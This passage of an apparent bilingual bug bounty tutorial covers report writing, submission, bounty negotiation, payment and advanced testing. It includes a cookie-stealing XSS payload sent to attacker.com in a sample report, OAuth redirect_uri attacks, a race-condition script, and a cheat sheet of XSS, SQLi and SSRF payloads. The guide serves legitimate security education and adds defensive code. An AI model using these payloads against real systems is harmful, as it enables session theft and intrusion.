# check ls ~/nuclei-templates for the exact names.
nuclei -u https://example.com -t cves/               # known CVEs
nuclei -u https://example.com -t exposures/          # exposed files
nuclei -u https://example.com -t misconfigurations/

# Multiple targets
nuclei -l targets.txt -t ~/nuclei-templates/ -severity high,critical

# Custom template
nuclei -u https://example.com -t my_custom.yaml

🤖 Chapter Summary

  • 🔧 Burp Suite + nuclei + dalfox = the core bug bounty toolkit
  • Automation lets you cover many targets at once
  • 📊 nuclei quickly finds known CVEs and misconfigurations; verify every hit manually before reporting
Chapter 08
📝 How to Write a Bug Report
A good report is what secures your bounty: the complete guide to writing one

💡 Why is a Good Report Important?

Results of a Good Report

  • Fast triage
  • Higher bounty awarded
  • The company trusts you
  • Private program invitations

Results of a Bad Report

  • Marked N/A or Informative
  • Lower bounty paid
  • Ban or reputation drop
  • A frustrated triage team

📊 Understanding the CVSS Score

CVSS (Common Vulnerability Scoring System) is the standard method for rating bug severity. It scores a bug on a 0–10 scale from a vector of base metrics (attack vector, complexity, privileges, user interaction, scope, confidentiality, integrity, availability).

Score      Severity      Example
9.0–10.0   🔴 Critical   Unauthenticated RCE, SQLi giving admin bypass
7.0–8.9    🟠 High       SSRF, Stored XSS, IDOR on sensitive data
4.0–6.9    🟡 Medium     Reflected XSS, CSRF, IDOR (low impact)
0.1–3.9    🟢 Low        Open Redirect, Info Disclosure
0.0        🔵 None       No security impact; missing best practices are usually closed as Informative

✍️ Golden Rules for Writing Reports

1
Title — Be Clear and Specific
❌ Bad: "XSS found"
✅ Good: "Stored XSS in /profile/bio via name parameter allows cookie theft"
2
Steps — Write them step by step
The triage team must be able to reproduce the bug exactly. Number every step.
3
Proof of Concept (PoC)
Provide a screenshot, video or code. Video is best.
4
Clarify the Impact
"What can be done with this bug?" Describe the realistic worst case, without overstating it.
5
Suggest Remediation
Suggest how to fix it. It shows understanding and can raise the bounty.

📝 Chapter Summary

  • 📌 A good title is half the work
  • 🎥 A PoC video raises the bounty
  • 💡 State the impact clearly: "what damage could occur"
Chapter 09
📋 Report Structure — Complete Template
Every section of a professional bug report in detail, with a worked example

📄 Complete Report Template

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
BUG BOUNTY REPORT
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
TITLE:    Stored XSS in /user/profile via 'bio' field allows session hijacking of any user
SEVERITY: High (CVSS 3.1 base score 7.6)
CVSS:     CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N
ASSET:    https://app.example.com/user/profile
DATE:     2024-01-15
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
VULNERABILITY SUMMARY
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
The 'bio' field in the user profile settings is rendered without output encoding,
allowing an attacker to store JavaScript that executes in the browser of any user
who visits the attacker's profile.
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
STEPS TO REPRODUCE
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
1. Create an account at https://app.example.com/register
2. Log in and go to Profile Settings
3. In the "Bio" field, enter the following payload:
   <script>document.location='https://attacker.com/?c='+document.cookie</script>
4. Click "Save Profile"
5. Log in as a second account you own (the victim)
6. Visit the attacker's profile page
7. Observe: the victim's session cookie is sent to the reporter-controlled server
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
PROOF OF CONCEPT (PoC)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
📸 Screenshot: [attached - xss_poc_1.png]  Shows the payload in the bio field
📸 Screenshot: [attached - xss_poc_2.png]  Shows the cookie received on the attacker server
🎥 Video:      [attached - xss_demo.mp4]   Full demonstration of the attack

HTTP Request:
POST /api/profile/update HTTP/1.1
Host: app.example.com
Content-Type: application/json
Authorization: Bearer [token]

{"bio": "<script>alert(document.domain)</script>"}
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
IMPACT
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
An attacker can exploit this vulnerability to:
• Steal the session cookies of any user who views the profile (where the cookie is not HttpOnly)
• Perform actions on behalf of victims (account takeover)
• Redirect victims to phishing pages
• Log keystrokes (credential theft)
• Spread worm-like by writing the payload into each visitor's own bio

Affected users: ALL registered users of the platform
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
REMEDIATION / FIX RECOMMENDATION
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
1. Apply context-aware output encoding to the bio field before rendering it in HTML
2. Deploy a Content Security Policy (CSP) header as defense in depth
3. If rich text is required, sanitize with DOMPurify or a similar allow-list sanitizer
4. Set the HttpOnly flag on session cookies (limits cookie theft; does not stop the other impacts)
Reference: https://owasp.org/www-community/attacks/xss/
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Reported by: [Your HackerOne username]
Test Environment: only test accounts created by the reporter; attacker.com is a
server the reporter controls. No real user data was accessed during testing.
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

📸 PoC Screenshot/Video Tips

📸 Screenshot Tips

  • Include the browser address bar so the URL is visible
  • Keep the payload clearly visible
  • Show the response or alert box
  • Annotate with arrows and highlights

🎥 Video Tips

  • Record with OBS or Loom
  • Show the target URL at the start
  • Perform each step clearly
  • Demonstrate the impact

📋 Report Template Summary

  • 📌 Title: vulnerability + location + impact
  • 📊 Severity + CVSS: calculate it independently
  • 📝 Steps: numbered, reproducible
  • 📸 PoC: screenshot + video + HTTP request
  • 💥 Impact: realistic worst case
  • 🔧 Remediation: fix suggestion + reference
Chapter 10
📤 Submission Process — কিভাবে Submit করেSubmission Process — How to Submit
HackerOne ও Bugcrowd-এ Bug Submit করার সম্পূর্ণ ধাপ-ধাপ গাইডComplete step-by-step guide to submitting bugs on HackerOne and Bugcrowd

🚀 Steps to Submit on HackerOne

1. Find the program
   hackerone.com/programs → select the program you want

2. Read the scope carefully
   Read the Policy, In-scope, Out-of-scope and Exclusions. Only then start testing.

3. Test the bug and document it
   When you find a bug, take screenshots/video right away. Save the raw HTTP request and response.

4. Check for duplicates
   Look in Hacktivity for similar bugs. Duplicates get no bounty. Note that Hacktivity only shows reports the program has disclosed, so it cannot rule out an earlier undisclosed report.

5. Click "Submit Report"
   Program page → "Submit Report" → fill out the form

6. Fill out the form
   Weakness: select the bug type (XSS, IDOR, etc.)
   Severity: give your estimate (with the CVSS vector)
   Title: clear and specific
   Description: write it following the template
   Attachments: attach screenshots/video

7. Submit and wait
   After submitting, you typically get a first response within 3–14 days.

⚠️ Pre-Submission Checklist

Confirm all of these before submitting:
  • The bug is within scope
  • The bug is reproducible
  • A PoC screenshot or video is included
  • The HTTP request/response is attached
  • The title is clear and descriptive
  • The impact section is well written
  • No real user data was accessed
  • Hacktivity was checked for duplicates
  • A remediation suggestion is included

🔄 What Happens After Submission?

SUBMITTED
   │
   ▼
NEW (the triage team has not looked at it yet)
   │
   ├──→ DUPLICATE   → someone reported it earlier, no bounty
   ├──→ N/A         → Not Applicable: not a bug, or out of scope
   ├──→ INFORMATIVE → a security issue, but no bounty
   │
   ▼
TRIAGED (triage confirmed it and it looks valid; some programs pay the bounty at this point)
   │
   ▼
RESOLVED (the fix has shipped) → 💰 BOUNTY PAID (if it was not already paid at triage)

A report that is already Triaged can still be closed as Duplicate if the program later finds an earlier internal or external report.

📤 Chapter Summary

  • 📋 Read scope → Test → Document → Duplicate check → Submit
  • ⚠️ Duplicates are the biggest problem; check Hacktivity first
  • After submitting, wait 3–14 days, do not spam the program
Chapter 11
💬 Triage, Communication & Negotiation
What to do after triage, how to stay professional, and how to negotiate a bounty

🏷️ Understanding Report Status

Status      | Meaning                        | Your action
------------|--------------------------------|----------------------------------
New         | Submitted, not yet reviewed    | Wait (3–7 days)
Triaged     | Valid, being fixed             | 🎉 Great! Wait
Resolved    | Fixed                          | 💰 You'll get the bounty
Duplicate   | Already reported               | Accept it, learn from it
N/A         | Not a bug, or out of scope     | Politely ask why
Informative | An issue, but no bounty        | Note it, move to the next target

💰 Bounty Negotiation

💡 When can you negotiate?
If you think the severity was underrated, say so politely and professionally. Never be aggressive.

# Example of a good negotiation message

"Hi [Program Name] Team,

Thank you for triaging my report. I noticed the severity was marked as 'Medium'. I'd like to clarify the impact further:

This vulnerability allows complete account takeover of any user without prior authentication, affecting all [X] million users. According to CVSS scoring, this would be rated High (7.5, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) due to:
- Network-accessible attack vector
- Low attack complexity
- High confidentiality impact

Could you please reconsider the severity? I'm happy to provide additional PoC if needed.

Best regards,
[Your username]"

Always include the vector string so the triager can check your arithmetic. Be careful that the vector matches what your PoC shows: a takeover that also lets the attacker act as the victim would carry I:H as well, which scores 9.1 (Critical). Claiming Critical with a PoC that only demonstrates data disclosure costs you credibility.

Professional Communication

  • Always be polite
  • Provide technical evidence
  • Justify with CVSS
  • Appeal once, then accept the decision

Never Do This

  • Send threatening messages
  • Pressure the program by threatening public disclosure
  • Spam messages
  • Use abusive language

💬 Chapter Summary

  • Triaged is good news: the bounty is on its way
  • 💰 Negotiate with technical evidence, not emotion
  • 🤝 Staying professional pays off the most in the long run
Chapter 12
💰 Getting Paid, Payment & Hall of Fame
How to receive bounties from Bangladesh, tax, CVEs, and Hall of Fame

💳 Payment Methods

Method                | Platform             | In Bangladesh      | Pros
----------------------|----------------------|--------------------|------------------------------
PayPal                | HackerOne, Bugcrowd  | ⚠️ Limited          | Fast, global
Bank Transfer (SWIFT) | HackerOne, Bugcrowd  | Works              | Directly to your bank
Payoneer              | HackerOne            | Good option        | Popular in BD
Crypto (BTC/ETH)      | Some programs        | ⚠️ Check legality   | Anonymous
Swag / Gift           | VDP programs         | 📦                 | T-shirt, merch, certificate
🇧🇩 Best Way to Receive Bounties from Bangladesh
  1. Open a Payoneer account (payoneer.com), it is free
  2. Connect Payoneer to HackerOne
  3. Transfer from Payoneer to bKash/Nagad or to your bank

🏆 Hall of Fame & CVE

🏆 Hall of Fame

Many companies list bug reporters on a Hall of Fame page on their website. This is very valuable for your portfolio.

  • Google — bughunters.google.com
  • Facebook — whitehat.fb.com
  • Microsoft — msrc.microsoft.com
  • Apple — support.apple.com/security

📋 CVE (Common Vulnerabilities and Exposures)

If you find a bug in open source software, you can get a CVE ID for it, which you can add to your LinkedIn/resume. The ID is assigned by a CVE Numbering Authority (CNA): many vendors and large open-source projects are their own CNA, GitHub acts as CNA for projects hosted there, and MITRE handles the rest. Request it after the maintainer has confirmed the bug, not before.

  • cve.mitre.org
  • nvd.nist.gov

💰 Chapter Summary

  • 🇧🇩 Payoneer + SWIFT bank transfer = the best option in Bangladesh
  • 🏆 Hall of Fame = free reputation + portfolio
  • 📋 Getting a CVE is great for your career
Chapter 13
🚀 Advanced Techniques & Tips
Chained bugs, business logic, GraphQL, OAuth, race conditions: advanced techniques

⛓️ Bug Chaining — the strategy for higher bounties

💡 What is bug chaining?
Combining a low-severity bug with another low or medium bug so that together they produce a high or critical impact. That earns far more than the same bugs reported separately, and it is also how a low-severity finding that would otherwise be closed as Informative becomes a paid report.

Example chain: Account Takeover
  Open Redirect (Low) + CSRF (Medium) + OAuth state not validated (Medium)
  = Account Takeover = CRITICAL 💰💰💰

Another chain:
  SSRF (blocked by WAF) + internal-IP filter bypass
  = SSRF reaching an internal service that permits code execution → RCE = Critical bounty!

🧠 Business Logic Flaws

# Business logic test examples

# 1. Negative price / quantity
POST /cart/add
{"item_id": 123, "quantity": -1, "price": -99.99}
# Does the shop end up paying you?

# 2. Discount code reuse
GET /apply-coupon?code=SAVE50
# Apply the same code again and again

# 3. Race condition (several requests in the same instant)
# Python example
import threading
import requests

URL = "https://app.example.com/redeem"   # absolute URL; in-scope target only
HEADERS = {"Cookie": "session=<your own test account>"}  # never a real user

def redeem():
    requests.post(URL, data={"points": 1000}, headers=HEADERS)

# create all threads first, then start them back to back so the
# requests land as close together as possible
threads = [threading.Thread(target=redeem) for _ in range(10)]
for t in threads:
    t.start()
for t in threads:
    t.join()
# Only one redemption should have happened. Did all 10 go through?

# 4. 2FA bypass
# Try to skip the 2FA step and go straight to the dashboard
GET /dashboard
# without completing 2FA
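The race-condition snippet above can only be run against a live target. As an added example that is not part of the guide, the block below models the same check-then-act flaw in a local, hypothetical "redeem points" service so the bug can be reproduced offline, and puts the locked fix next to it. The Barrier releases all threads at once, the same idea as sending a request group in parallel from Burp; the sleep between check and debit stands in for the database round-trips that give the race its window.

```python
# Added example (not part of the original guide): a local model of the
# "redeem points" race, so the check-then-act flaw can be reproduced offline
# without hitting any real target. The service and its API are hypothetical.
import threading
import time


class PointsService:
    """Hypothetical redeem endpoint: the balance is checked, then debited,
    with a window between the two steps (simulating DB round-trips)."""

    def __init__(self, balance, use_lock):
        self.balance = balance
        self.use_lock = use_lock
        self._lock = threading.Lock()

    def _check_then_debit(self, points):
        if self.balance >= points:        # check
            time.sleep(0.05)              # window: other threads still see the old balance
            self.balance -= points        # act
            return True
        return False

    def redeem(self, points):
        if self.use_lock:
            with self._lock:              # fix: check and debit become one atomic step
                return self._check_then_debit(points)
        return self._check_then_debit(points)


def run_race(use_lock, threads=10, balance=1000, points=1000):
    """Fire `threads` redemptions as simultaneously as possible and return
    (number of successful redemptions, final balance). Correct answer: (1, 0)."""
    svc = PointsService(balance, use_lock)
    barrier = threading.Barrier(threads)
    results = []

    def worker():
        barrier.wait()                    # all threads released together
        results.append(svc.redeem(points))

    workers = [threading.Thread(target=worker) for _ in range(threads)]
    for t in workers:
        t.start()
    for t in workers:
        t.join()
    return sum(results), svc.balance


if __name__ == "__main__":
    print("vulnerable:", run_race(use_lock=False))   # typically (10, -9000)
    print("fixed:     ", run_race(use_lock=True))    # (1, 0)
```

In a real application the lock is usually a database transaction with `SELECT ... FOR UPDATE` or a conditional `UPDATE ... WHERE balance >= points`; the point of the model is that any fix must make the check and the debit a single atomic operation, and that "retry a few times" is not a fix.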

🔵 GraphQL Testing

# GraphQL introspection (should be disabled in production)
POST /graphql
{"query": "{__schema{types{name}}}"}

# IDOR in a GraphQL query
query {
  user(id: "OTHER_USER_ID") {
    email
    phone
    address
  }
}

# Batch query attack (rate-limit bypass): one HTTP request carrying many operations
[
  {"query": "mutation { login(user:\"a\", pass:\"aa\") }"},
  {"query": "mutation { login(user:\"a\", pass:\"ab\") }"},
  ... (1000 queries at once)
]
# A rate limiter that counts HTTP requests sees one request here, not 1000 login attempts.
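The two GraphQL findings above are fixed on the server by refusing introspection outside development and by rate-limiting per operation instead of per HTTP request. The block below is an added example of such a gate, not code from the guide; the policy numbers, client identifier and request bodies are hypothetical and constructed for the demonstration.

```python
# Added example (not part of the original guide): a request gate for a
# GraphQL endpoint that blocks introspection and charges rate limits per
# operation, so an array of 1000 login mutations costs 1000, not 1.
import json
import re

# __schema / __type are the introspection roots; \b keeps the legitimate
# __typename field from matching.
INTROSPECTION = re.compile(r"__schema\b|__type\b")
MAX_BATCH = 10      # hypothetical policy: operations allowed per HTTP request
RATE_LIMIT = 20     # hypothetical policy: operations per client per window


def operations(body):
    """A GraphQL HTTP body is one {"query": ...} object or a JSON array of
    them (batching). Return the list of query strings, rejecting anything else."""
    data = json.loads(body)
    items = data if isinstance(data, list) else [data]
    queries = []
    for item in items:
        if not isinstance(item, dict) or not isinstance(item.get("query"), str):
            raise ValueError("malformed GraphQL request")
        queries.append(item["query"])
    return queries


class Gate:
    def __init__(self, allow_introspection=False):
        self.allow_introspection = allow_introspection
        self.used = {}  # client -> operations consumed in the current window

    def check(self, client, body):
        """Return (allowed, reason) for one HTTP request from `client`."""
        try:
            queries = operations(body)
        except ValueError as e:
            return False, str(e)
        if len(queries) > MAX_BATCH:
            return False, "batch too large"
        if not self.allow_introspection and any(INTROSPECTION.search(q) for q in queries):
            return False, "introspection disabled"
        used = self.used.get(client, 0) + len(queries)   # charge per operation
        if used > RATE_LIMIT:
            return False, "rate limit exceeded"
        self.used[client] = used
        return True, "ok"


if __name__ == "__main__":
    gate = Gate()
    batch = "[" + ",".join(['{"query": "mutation { login(user:\\"a\\", pass:\\"x\\") }"}'] * 5) + "]"
    print(gate.check("10.0.0.5", '{"query": "{__schema{types{name}}}"}'))
    for _ in range(5):
        print(gate.check("10.0.0.5", batch))   # fifth batch pushes past 20 operations
```

Array batching is only one of the tricks: aliases inside a single query (`{ a: login(...) b: login(...) }`) achieve the same thing and are not caught by this gate, which is why production servers also need query-cost or depth limits computed from the parsed document.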

🔑 OAuth Flaws

# Missing state parameter
GET /oauth/callback?code=AUTH_CODE
# No state parameter? A CSRF attack is possible (the victim's session gets bound to an attacker-controlled code).

# redirect_uri manipulation
GET /oauth/authorize?redirect_uri=https://attacker.com
GET /oauth/authorize?redirect_uri=https://example.com@attacker.com
GET /oauth/authorize?redirect_uri=https://example.com.attacker.com
# If any of these is accepted, the authorization code (or token) is delivered to the attacker's host.

# Token leakage via Referer
# If access_token travels as a URL parameter, it leaks through the Referer header of every outgoing link and into server logs.
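To see why the redirect_uri payloads above work, it helps to look at the check they defeat. The block below is an added example, not code from the guide: two weak redirect_uri checks next to the strict one, run against the three URLs from the text plus one constructed URL that only the substring check lets through, and a minimal state handler for the CSRF half of the chain. The client registry and client identifier are hypothetical.

```python
# Added example (not part of the original guide): redirect_uri validation as
# an authorization server might implement it, two weak checks beside the
# strict one, plus server-side handling of the OAuth state parameter.
import secrets
from urllib.parse import urlsplit

# Hypothetical client registration: exact redirect URIs, nothing looser.
REGISTERED = {
    "client-123": {"https://example.com/oauth/callback"},
}

# The three URLs from the text plus one constructed one (the last) that the
# prefix check rejects but the substring check still accepts.
PAYLOADS = [
    "https://attacker.com",
    "https://example.com@attacker.com",       # userinfo trick: real host is attacker.com
    "https://example.com.attacker.com",       # a subdomain of attacker.com
    "https://attacker.com/?next=example.com",
]
GOOD = "https://example.com/oauth/callback"


def weak_substring(client_id, redirect_uri):
    """Bug: accepts any URL that merely contains the expected host name."""
    return "example.com" in redirect_uri


def weak_prefix(client_id, redirect_uri):
    """Bug: prefix match, so '@attacker.com' or '.attacker.com' can be appended."""
    return redirect_uri.startswith("https://example.com")


def strict_exact(client_id, redirect_uri):
    """Fix: exact match against the URIs registered for this client, which is
    what RFC 6749 section 3.1.2.3 and the OAuth 2.0 Security BCP call for.
    Userinfo, fragments and non-https are rejected before the lookup."""
    parts = urlsplit(redirect_uri)
    if parts.scheme != "https" or parts.username or parts.password or parts.fragment:
        return False
    return redirect_uri in REGISTERED.get(client_id, set())


def evaluate(check):
    """Run one check over the attacker URLs and the legitimate one."""
    return [check("client-123", u) for u in PAYLOADS + [GOOD]]


class AuthSession:
    """State handling for the CSRF half of the chain: a random state bound to
    the user's session, compared in constant time on callback, single use."""

    def __init__(self):
        self.state = None

    def start(self):
        self.state = secrets.token_urlsafe(32)
        return self.state            # goes into the /oauth/authorize URL

    def callback(self, state_from_query):
        if self.state is None or state_from_query is None:
            return False             # no state issued, or none sent back
        ok = secrets.compare_digest(self.state, state_from_query)
        self.state = None            # consumed whether or not it matched
        return ok


if __name__ == "__main__":
    for check in (weak_substring, weak_prefix, strict_exact):
        print(f"{check.__name__:15} {evaluate(check)}")
```

The output shows the pattern you are testing for: the weak checks return True for the attacker URLs, the strict one returns True only for the registered callback. When reporting, state which of the three payloads was accepted; it tells the developer which broken comparison they have.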

🚀 Chapter Summary

  • ⛓️ Bug chain = Low + Low = High/Critical bounty
  • 🧠 To find business logic bugs, think outside the "normal flow"
  • Race conditions are valuable bugs that many hunters miss
Chapter 14
📚 Career Path, Resources & Cheat Sheet
Learning resources, career path, and the complete Bug Bounty cheat sheet

🎓 Best Learning Resources

🆓 Free

  • PortSwigger Web Academy
  • OWASP Testing Guide
  • HackTheBox (Free)
  • TryHackMe (Free)
  • YouTube: NahamSec, STÖK
  • PentesterLab (Free)

💰 Paid

  • HackTheBox Pro
  • TCM Security courses
  • Udemy courses
  • Bug Bounty Bootcamp (Vickie Li)
  • Offensive Security (OSCP)

📖 Books

  • The Web Application Hacker's Handbook
  • Bug Bounty Bootcamp — Vickie Li
  • Real World Bug Hunting
  • Hacking APIs

🗺️ Career Path

📗 Month 1–3: Foundation
   Learn PortSwigger Labs, the OWASP Top 10 and Burp Suite
   Tags: PortSwigger · TryHackMe · HTTP Basics

📘 Month 4–6: First Bugs
   Start on VDPs and public programs, submit your first bug
   Tags: HackerOne · First Report · VDP

📙 Month 7–12: First Bounty
   Move to paid programs, learn automation, get your first bounty
   Tags: First $$$ · Automation · Nuclei

📕 Year 2+: Full-Time Hunter
   Private programs, Top 100 hacker, $10K+/month
   Tags: Private Program · Top Hacker · Full Time

📋 Complete Cheat Sheet

🔴 XSS Payloads
  <script>alert(1)</script>          basic XSS
  <img src=x onerror=alert(1)>       image tag XSS
  <svg onload=alert(1)>              SVG XSS
  javascript:alert(1)                URI XSS (href/src contexts)
  "><script>alert(1)</script>        attribute escape

🟣 SQLi Payloads
  ' OR '1'='1'--                     auth bypass
  1 UNION SELECT null--              UNION test
  1' ORDER BY 3--                    column count
  '; WAITFOR DELAY '0:0:5'--         time-based (MSSQL)
  1' AND SLEEP(5)-- -                time-based (MySQL; MySQL needs whitespace after --, hence the trailing "-")

🔵 SSRF Payloads
  http://127.0.0.1/                  localhost
  http://169.254.169.254/            AWS metadata (IMDSv1; IMDSv2 requires a PUT for a token first)
  http://0x7f000001/                 hex bypass (127.0.0.1)
  http://[::1]/                      IPv6 bypass
  file:///etc/passwd                 file read

🟢 Recon Commands
  subfinder -d target.com            subdomain enum
  httpx -l subs.txt                  live host check
  ffuf -w list.txt -u URL/FUZZ       directory brute force
  gau target.com | gf xss            URLs with XSS-prone parameters
  nuclei -u target.com -t cves/      CVE scan

🏆 Tips from Successful Bug Hunters

  • 🎯 Focus: learn one bug type well, then move to the next
  • 📝 Take notes: write down what you found on each program
  • 🔄 Consistency: do something every day
  • 📖 Read writeups: HackerOne Hacktivity and Medium
  • 🤝 Community: stay active on Discord and Twitter (X)
  • 🏃 Don't give up: getting duplicates and N/As early on is normal

🎯 "Every great hacker was once a beginner who didn't give up."

This guide is entirely educational. Always work on authorized programs and follow responsible disclosure.

Bug Bounty Hunting v2.0 — Complete Bilingual Guide

14 Chapters • Bilingual • Dark Mode • Full Template